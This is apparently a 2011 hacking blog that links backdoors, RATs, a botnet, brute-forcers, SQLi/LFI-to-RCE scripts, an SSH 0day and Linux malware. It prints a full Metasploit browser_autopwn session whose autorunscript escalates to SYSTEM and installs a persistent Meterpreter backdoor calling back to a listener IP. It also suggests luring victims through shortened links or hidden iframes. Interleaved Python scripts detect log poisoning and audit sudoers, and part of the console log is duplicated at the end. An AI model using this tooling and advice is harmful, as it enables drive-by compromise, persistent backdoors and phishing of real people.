Quick post about a new tool I noticed today named PyXSSer. It can be found at darkpy.net and is an XSS testing tool in Python. It is still in development and I am told it should have a new version out soon :)
Here are some screenshots of it in action!
About to scan...
Scan complete, bug found!
It has no crawler as of yet, but should have one in the next release!
Monday, 29 August 2011
Saturday, 20 August 2011
Quick Update
Quick analysis and sample of some new FB-spreading malware to come tomorrow...
If I can be bothered :P
Also, more Linux malware dissection to come - I have gotten a MASSIVE collection to rip apart. If you have any, send it my way :D
Sorry about lack of content, I am addicted to Death Note (Anime) ever since I downloaded the entire fucking thing.
Review of the latest SS Rat and DarkComet to come as soon as possible also!
Thursday, 18 August 2011
Some tools I felt like sharing :)
This post is just so I can share a bundle of tools :) I was gonna make just two tarballs, but instead made them all separate so you can pick which ones you want.
Hydrogen.tgz - this is the Hydrogen backdoor written by Immunity. Look through it, it is very interesting. The client runs on Linux; the backdoor is for Windows, but IIRC it can be compiled for Linux hosts too. I will be writing a much longer article about this in a later instalment...
Hydrogen
QuadNX - Linux HTTP botnet, pain in the ass to set up, but works fine. I use it in VMs for stress testing apps on other VMs - botnet simulations :D
QuadNX
sshdoor.tgz - Bindshell that speaks the SSH protocol, so the backdoor's traffic is encrypted. Was "new" when it came out; backdoors have got a lot more secure since.
SSHdoor
websh-0.1a.tar.bz2 - a shell script and a PHP script: the PHP script goes on the pwned server, the shell script is the client. Gives terminal-like access. Have not played with it too much and cannot recall where I got the fucker...
WebSH
dorker.pl - a Perl script that uses a Google API key to search for sites that look SQLi-vulnerable and then sorts them, checking which ones actually are :D
Dorker
sql2rce.pl - a Perl script to automate getting remote code execution via SQL injection vulns and the Apache log injection method.
SQL2RCE
lfi2rce.pl - a Perl script to automate getting remote code execution via Local File Inclusion vulns and the log injection method.
LFI2RCE
sqlier-0.8.2b.sh - a shell script that automates some SQL injection attacks.
SQLier
shbrute.sh (in netcatscripts.tar.gz) - uses netcat to check whether anonymous FTP login is allowed and, if not, brute-forces the FTP login.
shwebscan.sh (in netcatscripts.tar.gz) - can scan for admin pages, or exploit both LFI and RFI vulns to inject a malicious PHP script like a C99 shell.
netcatscripts.tar.gz
gwee-1.36.tar.gz - a powerful tool for getting reverse shells using CGI-BIN exploits. It needs work to compile on *nix, but the Windows binary works under Wine.
SOURCE (and compiled Windows bin) Gwee-Source
Compiled Linux bin GWEE-Unix bin
Kingcope's SSH 0day remote root for FreeBSD (old but fun!)
ssh_0day.tar.gz
And finally, something I found in my travels and plan to dissect - Linux malware called the "LinuQ Sploit Pack"
Linux malware <--Warning. Do not run. Breaks things :(
That is all for now, though I am thinking of having every second link be an ad-fly link or something to make some money and get more storage from Dropbox, but I don't want to do that yet... Donations are welcome ;)
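The lfi2rce, sql2rce and shwebscan entries above all lean on the same trick: get the web server to write attacker-controlled PHP somewhere on disk (its own access/error log, or /proc/self/environ, which carries the User-Agent) and then include that file through an LFI. The defensive counterpart is the detection logic below. This is an added example, not part of the original post and not code from any of the tools listed: it parses Apache combined-format log lines, flags traversal, log/environ includes and PHP tags in the request, and reports clients that did both halves of the chain in order. The regexes and the sample log lines are mine, and the sample is constructed rather than taken from a real server.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")
# Files an LFI gets pointed at once something attacker-controlled has been written into them:
# the server's own logs (poisoned through the UA or URI) or /proc/self/environ (holds the UA).
POISON_TARGET_RE = re.compile(r"/var/log/|/proc/self/environ|access[._-]?log|error[._-]?log", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.I)

# Constructed sample, not a real server's log: one benign client, one attacker who first plants
# a PHP one-liner in the User-Agent and then includes the access log and /proc/self/environ,
# and a third client that only tries a plain traversal.
SAMPLE_LOG = r"""
10.0.0.5 - - [18/Aug/2011:10:01:02 +0100] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Aug/2011:10:02:10 +0100] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php system($_GET['c']); ?>"
198.51.100.7 - - [18/Aug/2011:10:02:11 +0100] "GET /index.php?page=../../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Aug/2011:10:02:20 +0100] "GET /index.php?page=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Aug/2011:10:05:00 +0100] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Aug/2011:10:06:00 +0100] "POST /login.php HTTP/1.1" 302 0 "http://example.test/index.php" "Mozilla/5.0"
""".strip().splitlines()


def decode(s):
    """Decode twice so a double-encoded ../ (%252e%252e%252f) is caught as well."""
    return unquote(unquote(s))


def classify(line):
    """Return {'ip', 'target', 'kinds'} for a parsed line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target, ua, ref = decode(m.group("target")), decode(m.group("ua")), decode(m.group("ref"))
    kinds = []
    if TRAVERSAL_RE.search(target):
        kinds.append("traversal")
    if POISON_TARGET_RE.search(target):
        kinds.append("log_or_environ_include")
    if any(PHP_TAG_RE.search(x) for x in (ua, ref, target)):
        kinds.append("php_in_request")
    return {"ip": m.group("ip"), "target": m.group("target"), "kinds": kinds}


def detect(lines):
    """Return (findings, chained_ips): every suspicious request, plus the clients that planted
    PHP and *afterwards* included a log/environ file, i.e. the lfi2rce-style chain end to end."""
    findings, planted, included = [], set(), set()
    for line in lines:
        c = classify(line)
        if not c or not c["kinds"]:
            continue
        findings.append(c)
        if "php_in_request" in c["kinds"]:
            planted.add(c["ip"])
        if "log_or_environ_include" in c["kinds"] and c["ip"] in planted:
            included.add(c["ip"])
    return findings, sorted(included)


if __name__ == "__main__":
    found, chains = detect(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:15} {','.join(f['kinds']):35} {f['target']}")
    print("full plant-then-include chains from:", chains)
```

The ordering check matters: an include of /var/log/apache2/access.log on its own is a probe, but the same client sending a PHP tag in its User-Agent a second earlier is the whole attack, so that is the line worth paging someone about.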
Tuesday, 9 August 2011
SS-RAT 2.0 Alpha 2 release!
SS-RAT 2.0 Alpha-2 is out!
With a lot more functionality than the first alpha, SS-RAT v2 is now available to download. It is totally open source like all of Slayer's projects, and is available from the Google Code repo here...
https://code.google.com/p/schwarzesonenrat/
I am refraining from writing more detailed stuff on it until its final release :)
BT5 Revision 1 is out tomorrow :D
LokiRAT leaked source code
Just a quick post - LokiRAT, a little-known PHP RAT (as in, controlled by a PHP script that acts as a proxy between commander and slave), has had its C# source leaked.
http://dl.dropbox.com/u/36983782/Source.rar
Converting it to C++ and adding some features while removing others is a project I am working on in my free time - I want to strip out the useless crap and add a Hijack Proxy feature.
Friday, 5 August 2011
BackTrack Linux and ExploitDB under DDoS or something?
See the video, note the date and time, I just recorded it there and converted it.
I think someone's being an arsehole again to the OffSec team :(
DDoS is no fun!
Thursday, 4 August 2011
Remember - sudo as an access control is UNIVERSALLY STUPID!
Hi, this is Darren again, showing how poorly set SUDO privs can REALLY ruin your day.
We have made a user (fuck) with a password of (fuck) and given the silly fucker access to "less" via SUDO.
Now lets REALLY ruin the sysadmins life, by giving FUCK root with a few commands!
See the video - it shows how it works :D
Remember - sudo as an access control is UNIVERSALLY STUPID! Use it as an AUDIT tool for logs instead!
~I take no responsibility for use of this here infodox. Use wisely
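As an added example (not Darren's video and not the page's own code): what turns "sudo less" into a root shell is less's own "!" command, documented in less(1). Run "sudo less /etc/hosts", type "!sh" at the prompt, and the shell is spawned by the root-owned less process. The quick check a sysadmin wants is a script that reads a sudoers file and flags every grant that is really root by another name. The Python below does that for the common "user host=(runas) TAG: cmd, cmd" form; the sample sudoers is constructed, the lists of escape-capable and file-writing programs are mine, and aliases and Defaults lines are ignored.

```python
import re
from dataclasses import dataclass, field

# Programs with a documented shell escape: "!sh" at the prompt of less/more/man, ":!sh" in
# vi/vim, awk 'BEGIN{system("/bin/sh")}', find -exec /bin/sh \;, tar --checkpoint-action=exec=sh.
SHELL_ESCAPE = {"less", "more", "man", "vi", "vim", "view", "nano", "awk", "gawk", "find",
                "perl", "python", "python3", "ruby", "env", "tar", "zip", "git", "gdb"}
# Programs that write arbitrary files as root (think /etc/sudoers or /etc/shadow). No child
# process is needed, so sudo's NOEXEC tag does nothing against these.
ROOT_FILE_WRITE = {"vi", "vim", "view", "nano", "tee", "cp", "mv", "dd", "rsync"}
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV", "LOG_INPUT", "NOLOG_INPUT",
        "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}
OPPOSITE = {"NOEXEC": "EXEC", "EXEC": "NOEXEC", "NOPASSWD": "PASSWD", "PASSWD": "NOPASSWD"}

# user host=(runas) [TAG: ...] cmd [args], cmd ...
LINE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")

# Constructed sample sudoers, not taken from any real host. The "fuck" line is the one from the video.
SAMPLE_SUDOERS = """
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
fuck    ALL=(root) /usr/bin/less
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
deploy  ALL=(root) NOEXEC: /usr/bin/vim /etc/app.conf
www     ALL=(root) /usr/sbin/service nginx reload
"""


@dataclass
class Grant:
    who: str
    runas: str
    command: str
    tags: set = field(default_factory=set)


def parse_sudoers(text):
    """Parse user-spec lines; Defaults and alias definitions are skipped."""
    grants = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        # "(ALL:ALL)" means run-as user ALL; no parentheses at all means root
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        tags = set()
        for item in m.group("spec").split(","):
            item = item.strip()
            # a tag applies to this command and to every later one in the list until overridden
            while ":" in item and item.split(":", 1)[0].strip().upper() in TAGS:
                tag, item = item.split(":", 1)
                tag = tag.strip().upper()
                tags.discard(OPPOSITE.get(tag, ""))
                tags.add(tag)
                item = item.strip()
            grants.append(Grant(m.group("who"), runas, item, set(tags)))
    return grants


def assess(grant):
    """Return (severity, reason) when the grant is root-equivalent, else None."""
    parts = grant.command.split()
    if grant.runas not in ("root", "ALL") or not parts:
        return None
    cmd = parts[0]
    prog = cmd.rsplit("/", 1)[-1]
    if cmd == "ALL":
        return ("root", "ALL: unrestricted root")
    if prog in ROOT_FILE_WRITE:
        return ("root", f"{prog} can write any file as root (e.g. /etc/sudoers); NOEXEC does not stop this")
    if prog in SHELL_ESCAPE:
        if "NOEXEC" in grant.tags:
            return ("warn", f"{prog} has a shell escape; NOEXEC blocks exec() from dynamically linked binaries")
        return ("root", f"{prog} has a shell escape that yields a root shell")
    return None


def audit_sudoers(text):
    findings = []
    for g in parse_sudoers(text):
        r = assess(g)
        if r:
            findings.append({"who": g.who, "command": g.command, "severity": r[0], "reason": r[1]})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['who']}: {f['command']} -> {f['reason']}")
```

The NOEXEC distinction is the part people get wrong: it stops less or vim from forking a shell (it works by LD_PRELOAD, so only for dynamically linked programs), but an editor run as root can still ":w /etc/sudoers", which is why the audit treats editors and copy tools as root regardless of the tag.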
Wednesday, 3 August 2011
Tutorials by Hex - WEP cracking (GERIX) and MAC Spoofing
Seeing as Hex cannot be fucked maintaining a blog, and I can, and we are working together on writing tutorials, making videos, etc., we decided that I would republish his manuals here :)
http://dl.dropbox.com/u/36983782/WEPcrackingforidiots.pdf
That is his WEP cracking guide...
http://dl.dropbox.com/u/36983782/macspoofingforidiots.pdf
That is the MAC spoofing guide...
Enjoy, and remember - don't be malicious!
Remote Admin Tools: DarkComet Tutorial/Overview
Get it here: http://dl.dropbox.com/u/36983782/darkcomet-tut.pdf
Now thing is, some people are going to say "LOL Dudes a skid RATS are for skids".
Ok, sure, whatever. Just remember: Poison Ivy is a RAT. Poison Ivy is an OLD RAT and it was SUCCESSFULLY used to pwn RSA.
Backdoors, malware, keyloggers, all that jazz, are actually a core feature of today's threat landscape, and therefore I believe they CAN be useful in a penetration test - especially for maintaining access.
The PDF I link to is a primer on using one of the more common ones available. Try it - it is shocking how much one can do with em.
Monday, 1 August 2011
Minor setback - SSD drive says no
Ok, I was GOING to post about integrating BeEF (Browser Exploitation Framework) and Metasploit's Browser Autopwn to create a horrible mess of browser-based evilness... I was halfway through writing it up when suddenly everything ceased working. So I tried a reboot. "No bootable media". WTF.
So I cracked the Acer open and found that indeed, my SSD drive had seemingly *cooked* itself, and it was fucking ROASTING hot. It was removed for the sake of safety, and I am booting from USB now.
I am waiting to get a replacement hard disk (later today) and then will do TWO writeups, one on WEP cracking the lazy man's way (Gerix) and another on either BeEF or some features of SET or something. I will also retake some screenshots of browser-autopwn, fun with those Netopia routers (what does this command do?) and a few other things.
Also, photos of insides of the Acer for the hell of it lol, and a shot of my toolkit I used to pry it open in College.
Sunday, 31 July 2011
Browser Autopwn and Post Exploitation Automation
In this post I simply show how you can leverage Metasploit's Browser Autopwn feature and post-exploitation automation to make your pwnage more efficient.
I will simply post a text log of the console session for now... At the bottom, I show all the commands executed and explain what they do and why.
########
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.0.0-testing [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 360 auxiliary - 70 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13406 updated yesterday (2011.07.29)
msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set LHOST 140.203.213.173
LHOST => 140.203.213.173
msf auxiliary(browser_autopwn) > show advanced
Module advanced options:
Name : AutoRunScript
Current Setting:
Description : A script to automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : DEBUG
Current Setting: false
Description : Do not obfuscate the javascript and print various bits of useful
info to the browser
Name : EXCLUDE
Current Setting:
Description : Only attempt to use exploits whose name DOES NOT match this
regex
Name : InitialAutoRunScript
Current Setting: migrate -f
Description : An initial script to run on session created (before
AutoRunScript)
Name : LPORT_GENERIC
Current Setting: 6666
Description : The port to use for generic reverse-connect payloads
Name : LPORT_JAVA
Current Setting: 7777
Description : The port to use for Java reverse-connect payloads
Name : LPORT_LINUX
Current Setting: 4444
Description : The port to use for Linux reverse-connect payloads
Name : LPORT_MACOS
Current Setting: 5555
Description : The port to use for Mac reverse-connect payloads
Name : LPORT_WIN32
Current Setting: 3333
Description : The port to use for Windows reverse-connect payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : MATCH
Current Setting:
Description : Only attempt to use exploits whose name matches this regex
Name : PAYLOAD_GENERIC
Current Setting: generic/shell_reverse_tcp
Description : The payload to use for generic reverse-connect payloads
Name : PAYLOAD_JAVA
Current Setting: java/meterpreter/reverse_tcp
Description : The payload to use for Java reverse-connect payloads
Name : PAYLOAD_LINUX
Current Setting: linux/meterpreter/reverse_tcp
Description : The payload to use for Linux reverse-connect payloads
Name : PAYLOAD_MACOS
Current Setting: osx/meterpreter/reverse_tcp
Description : The payload to use for Mac reverse-connect payloads
Name : PAYLOAD_WIN32
Current Setting: windows/meterpreter/reverse_tcp
Description : The payload to use for Windows reverse-connect payloads
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf auxiliary(browser_autopwn) > set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
autorunscript => use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2011-07-31 16:46:01 +0100
msf auxiliary(browser_autopwn) > [*] Done in 4.250804937 seconds
[*] Starting exploit modules on host 140.203.213.173...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/olNIWYBO
[*] Local IP: http://140.203.213.173:80/olNIWYBO
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MJRGMyJeIZ
[*] Local IP: http://140.203.213.173:80/MJRGMyJeIZ
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/tgeUOMS
[*] Local IP: http://140.203.213.173:80/tgeUOMS
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/hHgo
[*] Local IP: http://140.203.213.173:80/hHgo
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/vgsBT
[*] Local IP: http://140.203.213.173:80/vgsBT
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/lBSv
[*] Local IP: http://140.203.213.173:80/lBSv
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/WSwQ
[*] Local IP: http://140.203.213.173:80/WSwQ
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/LaCtIRmKFgjC
[*] Local IP: http://140.203.213.173:80/LaCtIRmKFgjC
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/YDmj
[*] Local IP: http://140.203.213.173:80/YDmj
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/OhNdpjvw
[*] Local IP: http://140.203.213.173:80/OhNdpjvw
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/gBDljyzASUIE
[*] Local IP: http://140.203.213.173:80/gBDljyzASUIE
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uWVoWM
[*] Local IP: http://140.203.213.173:80/uWVoWM
[*] Server started.
[*] Using URL: http://0.0.0.0:80/cCeAI
[*] Local IP: http://140.203.213.173:80/cCeAI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oMMWLifmjN
[*] Local IP: http://140.203.213.173:80/oMMWLifmjN
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/olsZbkWuHiC
[*] Local IP: http://140.203.213.173:80/olsZbkWuHiC
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VJwjFpawhrII
[*] Local IP: http://140.203.213.173:80/VJwjFpawhrII
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/vPSnVmSgq
[*] Local IP: http://140.203.213.173:80/vPSnVmSgq
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KamK
[*] Local IP: http://140.203.213.173:80/KamK
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kQfuNvwQvRfF
[*] Local IP: http://140.203.213.173:80/kQfuNvwQvRfF
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/eJDSgMe
[*] Local IP: http://140.203.213.173:80/eJDSgMe
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/yUgUbxfOz
[*] Local IP: http://140.203.213.173:80/yUgUbxfOz
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/FJULEockuokO
[*] Local IP: http://140.203.213.173:80/FJULEockuokO
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 140.203.213.173:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 140.203.213.173:6666
[*] Starting the payload handler...
[*] Started reverse handler on 140.203.213.173:7777
[*] Starting the payload handler...
[*] --- Done, found 22 exploit modules
[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*] Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
No active sessions.
msf auxiliary(browser_autopwn) >
########
"setg payload windows/meterpreter/reverse_tcp"
> This sets the global PAYLOAD variable to Windows Meterpreter, used wherever a module doesn't choose its own payload (browser_autopwn picks per-platform payloads through its PAYLOAD_* advanced options, as shown above).
"use server/browser_autopwn"
> This selects the browser_autopwn module.
"show options"
> This shows the options for the selected module.
"set SRVPORT 80"
> Sets SRVPORT to 80, meaning the port the targets must connect to is 80.
"set LHOST 140.203.213.173"
> Sets the IP address for back-connects to 140.203.213.173. Set this to your listener - normally the one started by Metasploit, i.e. YOU.
"show advanced"
> Shows the advanced options for the module.
"set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173"
> This is my own little mixin. It runs three commands one after another.
>> First, it loads the "priv" extension, so it can prepare to escalate privileges on pwned systems.
>>> Next it runs getsystem, which escalates privileges to SYSTEM.
>>>> Finally, it installs Meterpreter as a persistent backdoor that survives a reboot. I explain the flags below.
>>>>> -U means the persistent Meterpreter agent is started on user login.
>>>>>> -i 5 means it sleeps 5 seconds between reconnect attempts. I set this to a big number if there's an IDS.
>>>>>>> -p 6666 is the port to connect back to, where a multi/handler for windows/meterpreter/reverse_tcp (the persistence agent's default payload) must be listening. Note that in the session above browser_autopwn has already bound port 6666 to its generic/shell_reverse_tcp handler (LPORT_GENERIC), which will not stage Meterpreter, so pick a port browser_autopwn isn't using - the 443 from the PROTIP below is a good choice.
>>>>>>>> -r 140.203.213.173 is the IP to connect back to.
PROTIP: Set up Metasploit on a VPS and run multi/handler on 443 so the backdoors connect back to that. 443 is good for firewall bypassing.
"run"
> This command runs the module!
"sessions -l"
> This command lists the created Meterpreter/shell sessions (none yet in the log above, since no browser had visited the page).
"sessions -i 1" (not used here)
> Interact with session 1. -i <number> means interact with session <number>.
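Added example, not from the post and not Metasploit's own code: the log above is the only place browser_autopwn tells you which random URL belongs to which exploit and which port each payload will call back to, so here is a small Python parser for it. The excerpt is copied from the log above; the regexes and the ambiguity handling are mine. It also does the one check the autorunscript line needs: whether the port given to persistence -p is already taken by one of browser_autopwn's own handlers.

```python
import re

# Abridged msfconsole output copied from the browser_autopwn log above. The interleaved
# blackice/enjoysapgui pair and the final landing URL are kept on purpose.
AUTOPWN_LOG = """
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/olNIWYBO
[*] Local IP: http://140.203.213.173:80/olNIWYBO
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MJRGMyJeIZ
[*] Local IP: http://140.203.213.173:80/MJRGMyJeIZ
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uWVoWM
[*] Local IP: http://140.203.213.173:80/uWVoWM
[*] Server started.
[*] Using URL: http://0.0.0.0:80/cCeAI
[*] Local IP: http://140.203.213.173:80/cCeAI
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/eJDSgMe
[*] Local IP: http://140.203.213.173:80/eJDSgMe
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 140.203.213.173:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 140.203.213.173:6666
[*] Started reverse handler on 140.203.213.173:7777
[*] --- Done, found 22 exploit modules
[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*] Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.
"""

START_RE = re.compile(r"Starting exploit (\S+) with payload (\S+)")
URL_RE = re.compile(r"Local IP: (http://\S+)")
HANDLER_RE = re.compile(r"Starting handler for (\S+) on port (\d+)")


def parse_autopwn_log(text):
    """Map each exploit module to its URL, its payload and the handler port that payload calls back to."""
    exploits, pending, handlers, entry_url = [], [], {}, None
    for line in text.splitlines():
        m = START_RE.search(line)
        if m:
            e = {"module": m.group(1), "payload": m.group(2), "url": None, "ambiguous": False}
            exploits.append(e)
            pending.append(e)
            continue
        m = URL_RE.search(line)
        if m:
            if pending:
                # Exploit servers start in threads. When two "Starting exploit" lines were printed
                # before either URL, the URL-to-module pairing below is a guess and is marked as such.
                if len(pending) > 1:
                    for p in pending:
                        p["ambiguous"] = True
                pending.pop(0)["url"] = m.group(1)
            else:
                # the URL printed after "Done" is browser_autopwn's own landing page, the one you hand out
                entry_url = m.group(1)
            continue
        m = HANDLER_RE.search(line)
        if m:
            handlers[m.group(1)] = int(m.group(2))
    for e in exploits:
        e["lport"] = handlers.get(e["payload"])
    return {"entry_url": entry_url, "exploits": exploits, "handlers": handlers}


def persistence_port_conflict(handlers, port):
    """Return the payload whose browser_autopwn handler already owns `port`, or None if it is free."""
    for payload, lport in handlers.items():
        if lport == port:
            return payload
    return None


if __name__ == "__main__":
    plan = parse_autopwn_log(AUTOPWN_LOG)
    print("landing page:", plan["entry_url"])
    for e in plan["exploits"]:
        flag = " (url pairing ambiguous)" if e["ambiguous"] else ""
        print(f"{e['module']:55} {e['url']}  -> {e['payload']} on {e['lport']}{flag}")
    print("persistence -p 6666 conflicts with:", persistence_port_conflict(plan["handlers"], 6666))
```

Running it against the real log shows the collision the autorunscript line walks into: -p 6666 lands on the generic/shell_reverse_tcp handler, not on anything that will stage Meterpreter.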
Once you set it up, a nasty trick is to send the link (IP:port of the server) to people as a TinyURL-shortened link, so they get pwned rather swiftly. Or embed the link in an iframe with onload in a malicious website for spear phishing...
Have fun.
~For informational and educational purposes only, I am not responsible for your use of this infodox. Dont be malicious... Its mean!
[*] Started reverse handler on 140.203.213.173:7777
[*] Starting the payload handler...
[*] --- Done, found 22 exploit modules
[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*] Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.
msf auxiliary(browser_autopwn) > sessions -l
Active sessions
===============
No active sessions.
msf auxiliary(browser_autopwn) >
########
"setg payload windows/meterpreter/reverse_tcp"
> This command simply sets the global variable for payload as Windows Meterpreter where applicable.
"use server/browser_autopwn"
> This is to "use" the browser autopwn method
"show options"
> This shows options for the specific module
"set SRVPORT 80"
> Sets the variable SRVPORT to 80, meaning the port the targets must connect to is 80.
"set LHOST 140.203.213.173"
> Sets the IP address for back-connects to 140.203.213.173. Set this to your listener - normally the one started by metasploit, i.e. YOU.
"show advanced"
> Shows advanced options for the module
"set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173"
> This is my own little mixin. It runs three commands one after another.
